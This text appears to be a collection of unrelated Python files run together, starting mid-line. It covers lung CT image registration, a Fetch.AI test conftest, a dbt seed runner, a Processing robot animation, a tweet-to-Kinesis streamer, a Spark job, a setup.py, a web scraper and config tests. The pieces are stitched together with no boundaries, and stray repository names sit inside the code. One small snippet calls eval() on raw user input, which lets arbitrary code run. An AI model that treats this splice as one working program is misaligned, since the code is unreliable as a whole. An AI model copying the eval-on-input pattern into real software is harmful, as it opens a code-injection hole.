'%(levelname)s: %(message)s') from scipy import interpolate device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') case = 1 crop_range = [slice(0, 83), slice(43, 200), slice(10, 250)] pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 2 # crop_range = [slice(5, 98), slice(30, 195), slice(8, 243)] # pixel_spacing = np.array([1.16, 1.16, 2.5], dtype = np.float32) # case = 3 # crop_range = [slice(0, 95), slice(42, 209), slice(10, 248)] # pixel_spacing = np.array([1.15, 1.15, 2.5], dtype = np.float32) # case = 4 # crop_range = [slice(0, 90), slice(45, 209), slice(11, 242)] # pixel_spacing = np.array([1.13, 1.13, 2.5], dtype = np.float32) # case = 5 # crop_range = [slice(0, 90), slice(60, 222), slice(16, 237)] # pixel_spacing = np.array([1.10, 1.10, 2.5], dtype = np.float32) # case = 6 # crop_range = [slice(10, 107), slice(144, 328), slice(132, 426)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 7 # crop_range = [slice(13, 108), slice(141, 331), slice(114, 423)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 8 # crop_range = [slice(18, 118), slice(84, 299), slice(113, 390)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 9 # crop_range = [slice(0, 70), slice(126, 334), slice(128, 390)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) # case = 10 # crop_range = [slice(0, 90), slice(119, 333), slice(140, 382)] # pixel_spacing = np.array([0.97, 0.97, 2.5], dtype = np.float32) data_folder = f'/data/dirlab/Case{case}Pack/Image_MHD/' landmark_file = f'/data/dirlab/Case1Pack/ExtremePhases/case{case}_00_50.pt' states_folder = '/result/general_reg/dirlab/' config = dict( dim = 3, # dimension of the input image intensity_scale_const = 1000., # (image - intensity_shift_const)/intensity_scale_const intensity_shift_const = 1000., # scale = 0.7, scale = 0.5, initial_channels = 32, depth = 4, max_num_iteration = 3000, normalization = True, # whether use normalization layer learning_rate = 1e-2, smooth_reg = 1e-3, cyclic_reg = 1e-2, ncc_window_size = 5, load = False, load_optimizer = False, group_index_list = None, pair_disp_indexes = [0, 5], pair_disp_calc_interval = 20, stop_std = 0.0007, stop_query_len = 100, ) config = utils.structure.Struct(**config) landmark_info = torch.load(landmark_file) landmark_disp = landmark_info['disp_00_50'] # w, h, d landmark_00 = landmark_info['landmark_00'] landmark_50 = landmark_info['landmark_50'] crop_min = np.min(np.concatenate((landmark_00, landmark_50), axis = 0), axis = 0) - 8 crop_max = np.max(np.concatenate((landmark_00, landmark_50), axis = 0), axis = 0) + 8 print(crop_min) print(crop_max) image_file_list = sorted([file_name for file_name in os.listdir(data_folder) if file_name.lower().endswith('mhd')]) image_list = [sitk.GetArrayFromImage(sitk.ReadImage(os.path.join(data_folder, file_name))) for file_name in image_file_list] input_image = torch.stack([torch.from_numpy(image)[None] for image in image_list], 0) if config.group_index_list is not None: input_image = input_image[config.group_index_list] input_image = (input_image - config.intensity_shift_const)/config.intensity_scale_const input_image = input_image[:, :, crop_range[0], crop_range[1], crop_range[2]] image_shape = np.array(input_image.shape[2:]) # (d, h, w) num_image = input_image.shape[0] # number of image in the group regnet = model.regnet.RegNet_single(dim = config.dim, n = num_image, scale = config.scale, depth = config.depth, initial_channels = config.initial_channels, normalization = config.normalization) ncc_loss = model.loss.NCC(config.dim, config.ncc_window_size) regnet = regnet.to(device) input_image = input_image.to(device) ncc_loss = ncc_loss.to(device) optimizer = torch.optim.Adam(regnet.parameters(), lr = config.learning_rate) calcdisp = model.util.CalcDisp(dim = config.dim, calc_device = 'cuda') if config.load: state_file = os.path.join(states_folder, config.load) if os.path.exists(state_file): state_file = os.path.join(states_folder, config.load) states = torch.load(state_file, map_location = device) regnet.load_state_dict(states['model']) if config.load_optimizer: optimizer.load_state_dict(states['optimizer']) logging.info(f'load model and optimizer state {config.load}.pth') else: logging.info(f'load model state {config.load}.pth') grid_tuple = [np.arange(grid_length, dtype = np.float32) for grid_length in image_shape] landmark_00_converted = np.flip(landmark_00, axis = 1) - np.array([crop_range[0].start, crop_range[1].start, crop_range[2].start], dtype = np.float32) diff_stats = [] stop_criterion = model.util.StopCriterion(stop_std = config.stop_std, query_len = config.stop_query_len) pbar = tqdm.tqdm(range(config.max_num_iteration)) for i in pbar: optimizer.zero_grad() res = regnet(input_image) total_loss = 0. if 'disp_i2t' in res: simi_loss = (ncc_loss(res['warped_input_image'], res['template']) + ncc_loss(input_image, res['warped_template']))/2. else: simi_loss = ncc_loss(res['warped_input_image'], res['template']) total_loss += simi_loss if config.smooth_reg > 0: if 'disp_i2t' in res: smooth_loss = (model.loss.smooth_loss(res['scaled_disp_t2i']) + model.loss.smooth_loss(res['scaled_disp_i2t']))/2. else: # smooth_loss = model.loss.smooth_loss(res['scaled_disp_t2i']) smooth_loss = model.loss.smooth_loss(res['scaled_disp_t2i'], res['scaled_template']) total_loss += config.smooth_reg*smooth_loss smooth_loss_item = smooth_loss.item() else: smooth_loss_item = 0 if config.cyclic_reg > 0: if 'disp_i2t' in res: # cyclic_loss = (torch.mean((torch.sum(res['scaled_disp_t2i'], 0))**2) + torch.mean((torch.sum(res['scaled_disp_i2t'], 0)))**0.5)/2. cyclic_loss = ((torch.mean((torch.sum(res['scaled_disp_t2i'], 0))**2))**0.5 + (torch.mean((torch.sum(res['scaled_disp_i2t'], 0))**2))**0.5)/2. else: cyclic_loss = (torch.mean((torch.sum(res['scaled_disp_t2i'], 0))**2))**0.5 total_loss += config.cyclic_reg*cyclic_loss cyclic_loss_item = cyclic_loss.item() else: cyclic_loss_item = 0 total_loss.backward() optimizer.step() stop_criterion.add(simi_loss.item()) if stop_criterion.stop(): break pbar.set_description(f'{i}, simi. loss {simi_loss.item():.4f}, smooth loss {smooth_loss_item:.3f}, cyclic loss {cyclic_loss_item:.3f}') if i % config.pair_disp_calc_interval == 0: if 'disp_i2t' in res: disp_i2t = res['disp_i2t'][config.pair_disp_indexes] else: disp_i2t = calcdisp.inverse_disp(res['disp_t2i'][config.pair_disp_indexes]) composed_disp = calcdisp.compose_disp(disp_i2t, res['disp_t2i'][config.pair_disp_indexes], mode = 'all') composed_disp_np = composed_disp.cpu().numpy() # (2, 2, 3, d, h, w) inter = interpolate.RegularGridInterpolator(grid_tuple, np.moveaxis(composed_disp_np[0, 1], 0, -1)) calc_landmark_disp = inter(landmark_00_converted) diff = (np.sum(((calc_landmark_disp - landmark_disp)*pixel_spacing)**2, 1))**0.5 diff_stats.append([i, np.mean(diff), np.std(diff)]) print(f'\ndiff: {np.mean(diff):.2f}+-{np.std(diff):.2f}({np.max(diff):.2f})') if 'disp_i2t' in res: disp_i2t = res['disp_i2t'][config.pair_disp_indexes] else: disp_i2t = calcdisp.inverse_disp(res['disp_t2i'][config.pair_disp_indexes]) composed_disp = calcdisp.compose_disp(disp_i2t, res['disp_t2i'][config.pair_disp_indexes], mode = 'all') composed_disp_np = composed_disp.cpu().numpy() # (2, 2, 3, d, h, w) inter = interpolate.RegularGridInterpolator(grid_tuple, np.moveaxis(composed_disp_np[0, 1], 0, -1)) calc_landmark_disp = inter(landmark_00_converted) diff = (np.sum(((calc_landmark_disp - landmark_disp)*pixel_spacing)**2, 1))**0.5 diff_stats.append([i, np.mean(diff), np.std(diff)]) print(f'\ndiff: {np.mean(diff):.2f}+-{np.std(diff):.2f}({np.max(diff):.2f})') diff_stats = np.array(diff_stats) res['composed_disp_np'] = composed_disp_np states = {'config': config, 'model': regnet.state_dict(), 'optimizer': optimizer.state_dict(), 'registration_result':res, 'loss_list':stop_criterion.loss_list, 'diff_stats':diff_stats} index = len([file for file in os.listdir(states_folder) if file.endswith('pth')]) states_file = f'reg_dirlab_case{case}_{index:03d}.pth' torch.save(states, os.path.join(states_folder, states_file)) logging.info(f'save model and optimizer state {states_file}') plt.figure(dpi = plot_dpi) plt.plot(stop_criterion.loss_list, label = 'simi') plt.title('similarity loss vs iteration') 1-10 from film import models from base.repository import BaseRepository class MovieRepository(BaseRepository): class Meta: model = models.Movie class SeriesRepository(BaseRepository): class Meta: model = models.Series # -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2018-2019 Fetch.AI Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ """Conftest module for Pytest.""" import asyncio import inspect import logging import gym import os import socket import sys import time from asyncio import CancelledError from threading import Timer from typing import Optional, Set import docker as docker import pytest from docker.models.containers import Container from oef.agents import AsyncioCore, OEFAgent from aea import AEA_DIR from aea.configurations.base import ConnectionConfig from aea.connections.base import Connection from aea.mail.base import Envelope logger = logging.getLogger(__name__) CUR_PATH = os.path.dirname(inspect.getfile(inspect.currentframe())) # type: ignore ROOT_DIR = os.path.join(CUR_PATH, "..") CLI_LOG_OPTION = ["-v", "OFF"] CONFIGURATION_SCHEMA_DIR = os.path.join(AEA_DIR, "configurations", "schemas") AGENT_CONFIGURATION_SCHEMA = os.path.join(CONFIGURATION_SCHEMA_DIR, "aea-config_schema.json") SKILL_CONFIGURATION_SCHEMA = os.path.join(CONFIGURATION_SCHEMA_DIR, "skill-config_schema.json") CONNECTION_CONFIGURATION_SCHEMA = os.path.join(CONFIGURATION_SCHEMA_DIR, "connection-config_schema.json") PROTOCOL_CONFIGURATION_SCHEMA = os.path.join(CONFIGURATION_SCHEMA_DIR, "protocol-config_schema.json") DUMMY_ENV = gym.GoalEnv def pytest_addoption(parser): """Add options to the parser.""" parser.addoption("--ci", action="store_true", default=False) parser.addoption("--no-integration-tests", action="store_true", default=False, help="Skip integration tests.") @pytest.fixture(scope="session") def oef_addr() -> str: """IP address pointing to the OEF Node to use during the tests.""" return "127.0.0.1" @pytest.fixture(scope="session") def oef_port() -> int: """Port of the connection to the OEF Node to use during the tests.""" return 10000 def tcpping(ip, port) -> bool: """Ping TCP port.""" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, int(port))) s.shutdown(2) return True except Exception as e: logger.exception(e) return False class DummyConnection(Connection): """A dummy connection that just stores the messages.""" restricted_to_protocols = set() # type: Set[str] def __init__(self, connection_id: str = "dummy", restricted_to_protocols: Optional[Set[str]] = None): """Initialize.""" super().__init__(connection_id=connection_id, restricted_to_protocols=restricted_to_protocols) self.connection_status.is_connected = False self._queue = None async def connect(self, *args, **kwargs): """Connect.""" self._queue = asyncio.Queue(loop=self.loop) self.connection_status.is_connected = True async def disconnect(self, *args, **kwargs): """Disconnect.""" await self._queue.put(None) self.connection_status.is_connected = False async def send(self, envelope: 'Envelope'): """Send an envelope.""" assert self._queue is not None self._queue.put_nowait(envelope) async def receive(self, *args, **kwargs) -> Optional['Envelope']: """Receive an envelope.""" try: assert self._queue is not None envelope = await self._queue.get() if envelope is None: logger.debug("Received none envelope.") return None return envelope except CancelledError: return None except Exception as e: print(str(e)) return None def put(self, envelope: Envelope): """Put an envelope in the queue.""" assert self._queue is not None self._queue.put_nowait(envelope) @classmethod def from_config(cls, public_key: str, connection_configuration: ConnectionConfig) -> 'Connection': """Return a connection obj fom a configuration.""" class OEFHealthCheck(object): """A health check class.""" def __init__(self, oef_addr: str, oef_port: int, loop: Optional[asyncio.AbstractEventLoop] = None): """ Initialize. :param oef_addr: IP address of the OEF node. :param oef_port: Port of the OEF node. """ self.oef_addr = oef_addr self.oef_port = oef_port self._result = False self._stop = False self._core = AsyncioCore() self.agent = OEFAgent("check", core=self._core, oef_addr=self.oef_addr, oef_port=self.oef_port) self.agent.on_connect_success = self.on_connect_ok self.agent.on_connection_terminated = self.on_connect_terminated self.agent.on_connect_failed = self.exception_handler def exception_handler(self, url=None, ex=None): """Handle exception during a connection attempt.""" print("An error occurred. Exception: {}".format(ex)) self._stop = True def on_connect_ok(self, url=None): """Handle a successful connection.""" print("Connection OK!") self._result = True self._stop = True def on_connect_terminated(self, url=None): """Handle a connection failure.""" print("Connection terminated.") self._stop = True def run(self) -> bool: """ Run the check, asynchronously. :return: True if the check is successful, False otherwise. """ self._result = False self._stop = False def stop_connection_attempt(self): if self.agent.state == "connecting": self.agent.state = "failed" t = Timer(1.5, stop_connection_attempt, args=(self, )) try: print("Connecting to {}:{}...".format(self.oef_addr, self.oef_port)) self._core.run_threaded() t.start() self._result = self.agent.connect() self._stop = True if self._result: print("Connection established. Tearing down connection...") self.agent.disconnect() t.cancel() else: print("A problem occurred. Exiting...") except Exception as e: print(str(e)) finally: t.join(1.0) self.agent.stop() self.agent.disconnect() self._core.stop() return self._result def _stop_oef_search_images(): """Stop the OEF search image.""" client = docker.from_env() for container in client.containers.list(): if "fetchai/oef-search:0.7" in container.image.tags: logger.info("Stopping existing Docker image...") container.stop() def _wait_for_oef(max_attempts: int = 15, sleep_rate: float = 1.0): """Wait until the OEF is up.""" success = False attempt = 0 while not success and attempt < max_attempts: attempt += 1 logger.info("Attempt {}...".format(attempt)) oef_healthcheck = OEFHealthCheck("127.0.0.1", 10000) result = oef_healthcheck.run() if result: success = True else: logger.info("OEF not available yet - sleeping for {} second...".format(sleep_rate)) time.sleep(sleep_rate) return success def _create_oef_docker_image(oef_addr_, oef_port_) -> Container: client = docker.from_env() logger.info(ROOT_DIR + '/tests/common/oef_search_pluto_scripts') ports = {'20000/tcp': ("0.0.0.0", 20000), '30000/tcp': ("0.0.0.0", 30000), '{}/tcp'.format(oef_port_): ("0.0.0.0", oef_port_)} volumes = {ROOT_DIR + '/tests/common/oef_search_pluto_scripts': {'bind': '/config', 'mode': 'rw'}, ROOT_DIR + '/data/oef-logs': {'bind': '/logs', 'mode': 'rw'}} c = client.containers.run("fetchai/oef-search:0.7", "/config/node_config.json", detach=True, ports=ports, volumes=volumes) return c @pytest.fixture(scope="session") def network_node(oef_addr, oef_port, pytestconfig): """Network node initialization.""" if sys.version_info < (3, 7): pytest.skip("Python version < 3.7 not supported by the OEF.") if pytestconfig.getoption("no_integration_tests"): pytest.skip('skipped: no OEF running') return if pytestconfig.getoption("ci"): logger.warning("Skipping creation of OEF Docker image...") success = _wait_for_oef(max_attempts=10, sleep_rate=2.0) if not success: pytest.fail("OEF doesn't work. Exiting...") else: yield return else: _stop_oef_search_images() c = _create_oef_docker_image(oef_addr, oef_port) c.start() # wait for the setup... logger.info("Setting up the OEF node...") success = _wait_for_oef(max_attempts=10, sleep_rate=2.0) if not success: c.stop() c.remove() pytest.fail("OEF doesn't work. Exiting...") else: logger.info("Done!") time.sleep(1.0) yield logger.info("Stopping the OEF node...") c.stop() c.remove() def get_unused_tcp_port(): """Get an unused TCP port.""" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("", 0)) s.listen(1) port = s.getsockname()[1] s.close() return port import random from .run import ModelRunner, RunTask from .printer import ( print_run_end_messages, ) from dbt.contracts.results import RunStatus from dbt.exceptions import InternalException from dbt.graph import ResourceTypeSelector from dbt.logger import TextOnly from dbt.events.functions import fire_event from dbt.events.types import ( SeedHeader, SeedHeaderSeperator, EmptyLine, PrintSeedErrorResultLine, PrintSeedResultLine, PrintStartLine ) from dbt.node_types import NodeType from dbt.contracts.results import NodeStatus class SeedRunner(ModelRunner): def describe_node(self): return "seed file {}".format(self.get_node_representation()) def before_execute(self): fire_event( PrintStartLine( description=self.describe_node(), index=self.node_index, total=self.num_nodes, report_node_data=self.node ) ) def _build_run_model_result(self, model, context): result = super()._build_run_model_result(model, context) agate_result = context['load_result']('agate_table') result.agate_table = agate_result.table return result def compile(self, manifest): return self.node def print_result_line(self, result): model = result.node if result.status == NodeStatus.Error: fire_event( PrintSeedErrorResultLine( status=result.status, index=self.node_index, total=self.num_nodes, execution_time=result.execution_time, schema=self.node.schema, relation=model.alias, report_node_data=model ) ) else: fire_event( PrintSeedResultLine( status=result.message, index=self.node_index, total=self.num_nodes, execution_time=result.execution_time, schema=self.node.schema, relation=model.alias, report_node_data=model ) ) class SeedTask(RunTask): def defer_to_manifest(self, adapter, selected_uids): # seeds don't defer return def raise_on_first_error(self): return False def get_node_selector(self): if self.manifest is None or self.graph is None: raise InternalException( 'manifest and graph must be set to get perform node selection' ) return ResourceTypeSelector( graph=self.graph, manifest=self.manifest, previous_state=self.previous_state, resource_types=[NodeType.Seed], ) def get_runner_type(self, _): return SeedRunner def task_end_messages(self, results): if self.args.show: self.show_tables(results) print_run_end_messages(results) def show_table(self, result): table = result.agate_table rand_table = table.order_by(lambda x: random.random()) schema = result.node.schema alias = result.node.alias header = "Random sample of table: {}.{}".format(schema, alias) with TextOnly(): fire_event(EmptyLine()) fire_event(SeedHeader(header=header)) fire_event(SeedHeaderSeperator(len_header=len(header))) rand_table.print_table(max_rows=10, max_columns=None) with TextOnly(): fire_event(EmptyLine()) def show_tables(self, results): for result in results: if result.status != RunStatus.Error: self.show_table(result) MastaCoder/Projects1-10 # Main Robot Drawing robot = [ # [partOfRobot, Type, Parent, Position/Values] # Rect: x, y, w, h [False, 'fill', 'ground', [160, 82, 45]], [False, 'rect', 'ground', [0, 500, 800, 100]], [False, 'fill', 'feet', [0, 0, 0]], [True, 'rect', 'foot_l', [275, 475, 60, 25]], [True, 'rect', 'foot_r', [390, 475, 60, 25]], [False, 'fill', 'legs', [150, 150, 150]], [True, 'rect', 'leg_l', [310, 375, 25, 100]], [True, 'rect', 'leg_r', [390, 375, 25, 100]], [False, 'fill', 'box', [140, 140, 140]], [False, 'fill', 'arms', [150, 150, 150]], [True, 'rect', 'arm_l', [210, 230, 100, 25]], [True, 'rect', 'arm_r', [415, 230, 100, 25]], [False, 'fill', 'arms', [130, 130, 130]], [True, 'rect', 'fingers_l', [190, 230, 20, 10]], [True, 'rect', 'fingers_l', [190, 245, 20, 10]], [True, 'rect', 'fingers_r', [515, 230, 20, 10]], [True, 'rect', 'fingers_r', [515, 245, 20, 10]], # Moving Parts [False, 'fill', 'neck', [150, 150, 150]], [True, 'rect', 'neck', [350, 205, 25, 20]], [True, 'rect', 'broadcast', [359, 150, 5, 55]], [False, 'fill', 'bulb', [255, 0, 0]], [True, 'ellipse', 'bulb', [361, 150, 15, 15]], [False, 'fill', 'ears', [145, 145, 145]], [True, 'rect', 'wing_l', [307, 160, 70, 15]], [True, 'rect', 'ear_l', [313, 155, 12, 25]], [True, 'rect', 'wing_r', [348, 160, 70, 15]], [True, 'rect', 'ear_r', [400, 155, 12, 25]], # End Moving [False, 'fill', 'body', [130, 130, 130]], [True, 'rect', 'body', [310, 225, 105, 175]], [True, 'rect', 'box', [325, 240, 75, 40]], [False, 'fill', 'button_1', [225, 225, 225]], [True, 'ellipse', 'button_1', [345, 260, 20, 20]], [False, 'fill', 'button_2', [225, 225, 225]], [True, 'ellipse', 'button_2', [380, 260, 20, 20]], [False, 'fill', 'head', [170, 170, 170]], [True, 'rect', 'head', [325, 130, 75, 75]], [False, 'fill', 'eyes', [255, 255, 255]], [True, 'rect', 'eye_l', [335, 145, 15, 15]], [True, 'rect', 'eye_r', [375, 145, 15, 15]], [False, 'fill', 'pupils', [0, 0, 0]], [True, 'rect', 'pupil_l', [339, 149, 7, 7]], [True, 'rect', 'pupil_r', [379, 149, 7, 7]], [True, 'rect', 'mouth', [343, 180, 40, 5]], [False, 'textsize', 32], [True, 'text', ["M-Robo 7000", 100, 100]], ] tick = 0 moveable = ['wing_l', 'wing_r', 'bulb', 'broadcast', 'head', 'ear_l', 'ear_r', 'pupil_l', 'pupil_r', 'eye_l', 'eye_r', 'mouth'] mov = [0, 0] fall = False button = [False, False] hover = [0, 0] head = [0, 0] # First setup def setup(): print("Script is running..") size(800, 600) # Size of window (w, h) # Main loop def draw(): global robot, mov, hover, tick tick += 1 if hover[0] == 1: if hover[1] <= 60: hover[1] += 1 else: hover[0] = 2 elif hover[0] == 0 and hover[1] > 0: hover[1] -= 1 if fall and mov[1] < 400: mov[1] += 8 elif not fall and mov[1] > 0: mov[1] -= 8 # Done every loop clear() background(135, 206, 235) # Loop and create. for part in robot: if part[0]: y = 0 x = mov[0] if fall or (not fall and mov[1] > 0): print("fell", mov[1]) if mov[1] + part[3][3] + part[3][1] >= 500: y = 500 - part[3][3] - part[3][1] else: y = mov[1] elif hover[0] >= 1 or (hover[0] == 0 and hover[1] > 0): if part[2] == "wing_l": x += hover[1] * -1 / 2 elif part[2] == "wing_r": x += hover[1] / 2 elif part[2] == "broadcast" or part[2] == "bulb": y += hover[1] * -1 elif part[2] == "neck": y += hover[1] if hover[0] == 2 and part[2] in moveable: x += head[0] y += head[1] pushMatrix() translate(x, y) # Is part an object? if part[1] == "fill": if button[0] and part[2] == "button_1": part[3][1] = 0 part[3][2] = 0 elif part[2] == "button_1": part[3][1] = 225 part[3][2] = 225 if button[1] and part[2] == "button_2": part[3][1] = 0 part[3][2] = 0 elif part[2] == "button_2": part[3][1] = 225 part[3][2] = 225 fill(part[3][0], part[3][1], part[3][2]) elif part[1] == "rect": rect(part[3][0], part[3][1], part[3][2], part[3][3]) elif part[1] == "ellipse": ellipse(part[3][0], part[3][1], part[3][2], part[3][3]) elif part[1] == "text": text(part[3][0], part[3][1], part[3][2]) elif part[1] == "textsize": textSize(part[3]) else: print("Value does not exist!") if part[0]: popMatrix() def keyPressed(): global key, mov, fall, hover if key == "a" and mov[0] > -190: if hover[0] == 2: head[0] -= 5 else: mov[0] -= 5 if key == "d" and mov[0] < 265: if hover[0] == 2: head[0] += 5 else: mov[0] += 5 if key == "w" and head[1] > -100: if hover[0] == 2: head[1] -= 8 if key == "s": print(head[1]) if hover[0] == 2 and head[1] <= 0: head[1] += 10 if key == "b": if hover[0] == 0: fall = not fall button[0] = not button[0] if key == "f": goHover() print("mov", mov) def mouseClicked(): global mouseX, mouseY, button, fall if mouseX in range(335 + mov[0], 356 + mov[0]) and mouseY in range(250 + mov[1], 271 + mov[1]): button[0] = not button[0] fall = not fall elif mouseX in range(370 + mov[0], 390 + mov[0]) and mouseY in range(250 + mov[1], 271 + mov[1]): goHover() print(mouseX, mouseY) def goHover(): global hover if hover[0] == 0: hover[0] = 1 elif hover[0] == 2 and head[0] in range(-10, 10) and head[1] in range(-10, 10): hover[0] = 0 else: return button[1] = not button[1] import logging import boto3 from configparser import ConfigParser from botocore.exceptions import ClientError from tweepy import StreamListener, Stream, OAuthHandler class TweetListener(StreamListener): def __init__(self, config): super(StreamListener, self).__init__() self.config = config self.aws_access_key_id = self.config.get("aws", "access_key_id") self.aws_secret_access_key = self.config.get("aws", "secret_access_key") self.delivery_stream = self.config.get("kinesis", "delivery_stream") self.firehose_client = boto3.client("firehose", aws_access_key_id=self.aws_access_key_id, aws_secret_access_key=self.aws_secret_access_key) def on_data(self, tweet): """ Push matching tweets to Kinesis. :param tweet: Tweet data as dict :return: """ try: logging.info("Pushing tweet data to Kinesis") response = self.firehose_client.put_record(DeliveryStreamName=self.delivery_stream, Record={ "Data": tweet }) logging.debug(response) return True except ClientError as ex: logging.exception(f"Could not push tweet data to Kinesis: {ex}") def on_error(self, status_code): """ Handle errors. :param status_code: HTTP status code :return: """ logging.error(status_code) # https://tweepy.readthedocs.io/en/latest/streaming_how_to.html#handling-errors if status_code == 420: return False if __name__ == "__main__": # load config config = ConfigParser(converters={"list": lambda x: [e.strip() for e in x.split(",")]}) config.read("app.cfg") # start logging logging.basicConfig(level=config.get("logging", "level"), format="%(asctime)s - %(levelname)s - %(message)s") logging.info("Started") # authenticate to twitter API logging.info("Authenticating to Twitter") auth = OAuthHandler(config.get("twitter", "consumer_key"), config.get("twitter", "consumer_secret")) auth.set_access_token(config.get("twitter", "access_token"), config.get("twitter", "access_token_secret")) # start streaming logging.info(f"Start streaming tweets matching: {config.getlist('tweepy', 'track_topics')}") twitter_stream = Stream(auth, TweetListener(config)) twitter_stream.filter(track=config.getlist("tweepy", "track_topics"), languages=config.getlist("tweepy", "track_langs")) from __future__ import print_function import os import sys from pyspark.sql import SparkSession from pyspark.sql.types import Row, StructField, StructType, StringType, IntegerType, ArrayType from pyspark.sql.functions import col, split, udf, size, element_at, explode, when, lit import pyspark.sql.functions as F # this process is just to subset the data into a smaller subset # for easy checking of processes path = '/opt/spark-data' spark = SparkSession \ .builder \ .appName("S3_Analysis") \ .master("spark://spark-master:7077") \ .config("spark.executor.cores", "8") \ .config("spark.executor.memory", "16g") \ .config("spark.num.executors", "2") \ .enableHiveSupport() \ .getOrCreate() s3_stats = spark.read.parquet(os.path.join(path, "s3logs")) s3_stats.createOrReplaceTempView("s3_stats") subset = spark.sql("SELECT * FROM s3_stats LIMIT 100000") subset.write.mode("overwrite").parquet(os.path.join(path, "small_logs")) spark.stop()setup.py from setuptools import setup, find_packages # name is the package name in pip, should be lower case and not conflict with existing packages # packages are code source setup( name="astrosimon", version="0.8.5", description="Simulation Monitor for computational astrophysics", url="https://github.com/maxwelltsai/SiMon", author=", ", author_email="", license="BSD 2-Clause", packages=find_packages(), zip_safe=False, install_requires=["python-daemon", "numpy"], entry_points={ "console_scripts": ["simon = SiMon.simon:main"], }, ) name = input("What's your name? ") print("Nice to meet you " + name + "!\n") cities_lithuania = input("Largest cities in Lithuania: ") print(cities_lithuania, type(cities_lithuania)) cities_lithuania = eval(input("Largest cities in Lithuania (example: [\"Vilnius\", \"Kaunas\"]): ")) print(cities_lithuania, type(cities_lithuania), "\n") Iamdavidonuh/getmusic from engine.root import BaseEngine """Figure out a way to combine both ftch and search""" """Also find a way to differentiate between album and track children when using Search not Fetch""" class JustNaija(BaseEngine): engine_name = "justnaija" page_path = "page" album_path = "album" album_category = "music" tracks_page_path = "music-mp3" def __init__(self): super().__init__() self.site_uri = "https://justnaija.com/" self.request_method = self.GET def get_url_path(self, page=None, category=None): # if page return ( (self.tracks_page_path, self.page_path, str(page)) if category == self.TRACK else (self.album_category, self.album_path, self.page_path, str(page)) ) def search(self, query=None, page=None, category=None, **kwargs): soup = self.get_soup(url=self.get_formated_url(category="albums", page=2)) response = self.parse_parent_object(soup) print(response) return response def parse_parent_object(self, soup): return list(elem["href"] for elem in soup.select("main article h3 a")) def parse_object(self, soup, category=None): header_elem = soup.select('div[class="mpostheader"] span[class="h1"]')[0] try: download_link = soup.select('p[class="song-download"] a')[0]["href"] except Exception: download_link = None art_link = soup.select('figure[class="song-thumbnail"] img')[0]["src"] if category == self.TRACK: artist, title = header_elem.text.split("] ")[1].split(" – ") return artist, title = header_elem.text.split(" | ")[0].split(" – ") tracklist_elem = soup.select( 'div[class="mu-o-c"] div[class="mu-o-unit-c"] div[class="album-side-1"]' ) for track_elem in tracklist_elem: song_link = track_elem.h4.a["href"] song_title = ( track_elem.h4.a.text + track_elem.span.text if track_elem.span != None else track_elem.h4.a.text ) return dict(artist=artist, title=title) """Tests for the config.py module.""" from pathlib import Path import pytest from metno_locationforecast.config import Config class TestConfig: class TestPossibleUserConfigFiles: def test_metno_locationforecast_file(self, monkeypatch): monkeypatch.setattr( Config, "cwd", Path("./tests/test_configs/test_metno_locationforecast_file/") ) config = Config() result = list(config.possible_user_config_files) expected = [ Path( "./tests/test_configs/test_metno_locationforecast_file/" "metno-locationforecast.ini" ) ] assert result == expected def test_setup_file(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_setup_file/")) config = Config() result = list(config.possible_user_config_files) expected = [Path("./tests/test_configs/test_setup_file/setup.cfg")] assert result == expected def test_multiple_files(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_multiple_files/")) config = Config() result = list(config.possible_user_config_files) expected = [ Path("./tests/test_configs/test_multiple_files/metno-locationforecast.ini"), Path("./tests/test_configs/test_multiple_files/setup.cfg"), ] assert result == expected def test_no_files(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_no_config_file/")) config = Config() result = list(config.possible_user_config_files) expected = [] assert result == expected class TestInit: def test_metno_locationforecast_file(self, monkeypatch): monkeypatch.setattr( Config, "cwd", Path("./tests/test_configs/test_metno_locationforecast_file/") ) config = Config() assert config.forecast_type == "metno_locationforecast_file" assert config.user_agent == "metno_locationforecast_file" assert config.save_location == "metno_locationforecast_file" assert config.base_url == "metno_locationforecast_file" assert config.user_config_file == str( Path( "./tests/test_configs/test_metno_locationforecast_file/" "metno-locationforecast.ini" ).resolve() ) def test_setup_file(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_setup_file/")) config = Config() assert config.forecast_type == "setup_file" assert config.user_agent == "setup_file" assert config.save_location == "setup_file" assert config.base_url == "setup_file" assert config.user_config_file == str( Path("./tests/test_configs/test_setup_file/setup.cfg").resolve() ) def test_precedence_of_files(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_multiple_files/")) config = Config() assert config.forecast_type == "metno_locationforecast_file" assert config.user_agent == "metno_locationforecast_file" assert config.save_location == "metno_locationforecast_file" assert config.base_url == "metno_locationforecast_file" assert config.user_config_file == str( Path( "./tests/test_configs/test_multiple_files/metno-locationforecast.ini" ).resolve() ) def test_no_files(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_no_config_file/")) config = Config() assert config.forecast_type == "compact" assert config.user_agent is None assert config.save_location == "./data" assert config.base_url == "https://api.met.no/weatherapi/locationforecast/2.0/" assert config.user_config_file is None def test_partial_configuration(self, monkeypatch): monkeypatch.setattr( Config, "cwd", Path("./tests/test_configs/test_partial_configuration/") ) config = Config() assert config.forecast_type == "compact" assert config.user_agent == "setup_file" assert config.save_location == "./data" assert config.base_url == "https://api.met.no/weatherapi/locationforecast/2.0/" 